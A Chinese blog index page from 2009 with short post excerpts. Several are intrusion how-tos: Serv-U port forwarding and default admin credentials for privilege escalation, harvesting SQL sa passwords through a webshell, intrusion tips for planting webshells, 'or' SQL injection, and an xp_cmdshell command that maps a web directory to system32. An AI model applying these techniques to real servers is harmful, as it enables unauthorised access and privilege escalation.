serv-u ftp 转发端口（服务器提权系列之四）

作者:adbrave 日期:2009-01-06

课程主要内容：利用webshell上传、执行功能，将默认serv-u ftp管理端口映射到外网，通过默认serv-u ftp连接密码，获得系统权限。
关键技术要点：serv-u ftp管理端口映射的详细方法。

serv-u默认监听127.0.0.1:43958,serv-u默认管理账号是LocalAdministrator,默认密码

分类:网络技术@安全 | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 5

追查serv-u ftp帐户信息（服务器提权系列之三）

作者:adbrave 日期:2009-01-06

课程主要内容：通过webshell，分析serv-u ftp安装路径下的帐户密码信息，获得serv-u ftp的连接帐户密码，并通过修改serv-u ftp配置文件提权。

关键技术要点：修改serv-u ftp配置文件。

Tags: 服务器服务器详解详解黑客攻防黑客攻防

分类:网络技术@安全 | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 19

Div+Css登陆窗体实现

作者:admin 日期:2009-01-06

HTML表单

程序代码"/> 程序代码

分类:网站设计 | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 13

apache2.2.8在windows2003下的安全设置

作者:admin 日期:2009-01-05

众所周知，在windows下当Apache第一次被安装为服务后，它会以用户“System”(本地系统账号)运行。如果web服务器的所有资源都在本地系统上，这样做会问题比较少，但是将会具有很大的安全权限来影响本地机器，因此千万不能开启System帐号的网络权限！

于是要创建一个新的帐户来替代这个帐号启动apache并设置相应的权限：

Tags: 服务器服务器网络网络 IIS IIS

分类:网络技术@安全 | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 14

谈点个人入侵的经验（转载）

作者:admin 日期:2009-01-05

下面谈谈个人入侵的经验，不分语言，只谈拿webshell，至于提权，这里不说，我也很少提权，除非确实有必要！~

1.无论什么站，无论什么语言，我要渗透，第一件事就是扫目录，最好一下扫出个上传点，直接上传shell，诸位不要笑，有时候你花很久搞一个站，最后发现有个现成的上传点，而且很容易猜到，不过这种情况发生在asp居多！

2.asp（aspx）+MSSQL先考虑注入，一般的注入都有DBowner权限可以直接写shell；如果写不了，或者web与数据库分离，那就猜数据，从后台下手了，后台可以上传或者改配置文件；

分类:网络技术@安全 | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 18

追查SQL密码（服务器提权系列之二）

作者:adbrave 日期:2009-01-05

概述：通过webshell，查询网站文件夹下的conn或者其他数据库连接文件，找出sa或者其他sql server连接帐户的密码，使用webshell中的数据库执行功能提权，或者使用外部连接数据库并执行的方式提权。

MSSQL的数据库帐户权限类似WINDWOS，简单来说可以分为SA，DB_OWNER,PCUBLIC等,SA 类似WINDWOS中的管理员帐号,DB_OWNER类似WINDOWS中,的SUPERUSER,

那么假设你得到了这个SA帐号,不是相当于得到了WINDOWS的管理员帐号吗?有了他,你能像WINDOWS的管理员一样,执行任何命令,包括建WINDOWS管理员的命令,,执行任何程序.

Tags: MSSQL MSSQL 黑客攻防黑客攻防

分类:网络技术@黑客攻防 | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 16

关于windowsXP到底能不能安装iis6.0

作者:admin 日期:2009-01-05

刚参与一个项目，是对ERP, CRM, WMS的整合，要用到Win Server 2003和BizTalk，我自己机器是装XP Pro SP2的，只有IIS6.0才能提供Web Service Application Pool，IIS5.1是没有这个功能的。所以到处找XP Pro装IIS6.0的方法。昨晚确认IIS6.0不能装在XP Pro上，所以只能使用VPC搞个win2003的镜像了。

补充下：以后各位如果在网上看到xp pro装iis6.0，那都是一传十十传百传开来的，而传的人自己也没验证过。网上的iis6.0安装包是在win2003安装iis6.0时"抠"出来的，这是为了方便装了2003但是没有win2003的光盘来装iis6.0的人，这个安装包只适合于在win2003下安装。而另外还有方法说通过win xp pro sp1光盘安装iis6.0，这是胡扯，因为通过这种方式安装，最后得到的是iis5.1。如果下载下来的安装包有Installer，那么这也是假的，安装好之后你会发现iis版本是5.1。微软官网上没提供iis6.0的安装包下载，只有iis6.0 manager for xp pro，3.7M的那个。

通过我的实践，iis6.0不能安装在xp pro中。

分类:电脑知识 | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 7

无法获得Web绝对路径的入侵方法（黑客攻防）

作者:admin 日期:2009-01-05

我们很多情况下都遇到SQL注入可以列目录和运行命令，但是却很不容易找到web所在目录，也就不好得到一个webshell，这一招不错：

　　exec master.dbo.xp_cmdshell ’cscript C:\Interpub\AdminScripts\mkwebdir.vbs -c localhost -w "l" -v "win","c:\windows\system32"’

　　建立虚拟目录win,指向c:\windows\system32

分类:网络技术@黑客攻防 | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 7

or注射经典

作者:admin 日期:2009-01-05

以前搞ASP网站的朋友都是用明小子或者啊D 对ASP网站进行注射，但是如果ASP站点有防注射代码怎么办呢？那就用or注射。

记得一年前火狐有一位朋友问,如果一个站过滤了and和"'"的话，改怎么注入啊？当时我随口说了句"or注入"，后来又一次看贴的时候，看到他问我该怎么利用呢？我就写了几个简单的语句给他，叫他自己变换，他很感激我，还说网上没有这种方法。我到网上查了查，还真没有or注入专题呢（or 1=1除外），呵呵，所以，一年后的今天，就有了这篇文章。
我们用雷霆购物系统做or注入演示。我们先用or 1=1和or 1=2来测试是否存在注入点，我们先来看正常页面的面貌。我们现在用or 1=1测试是否存在注入漏洞。返回的是另外一个页面，我们再来测试or 1=2。返回的是正常的页面，说明猜测正确的时候是错误，猜测错误的时候是正常，这就是真正的"假是真时真是假"，比lake2大哥哥的IP欺骗更经典哦，呵呵。
我们来构造测试语句：

分类:网络技术 | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 12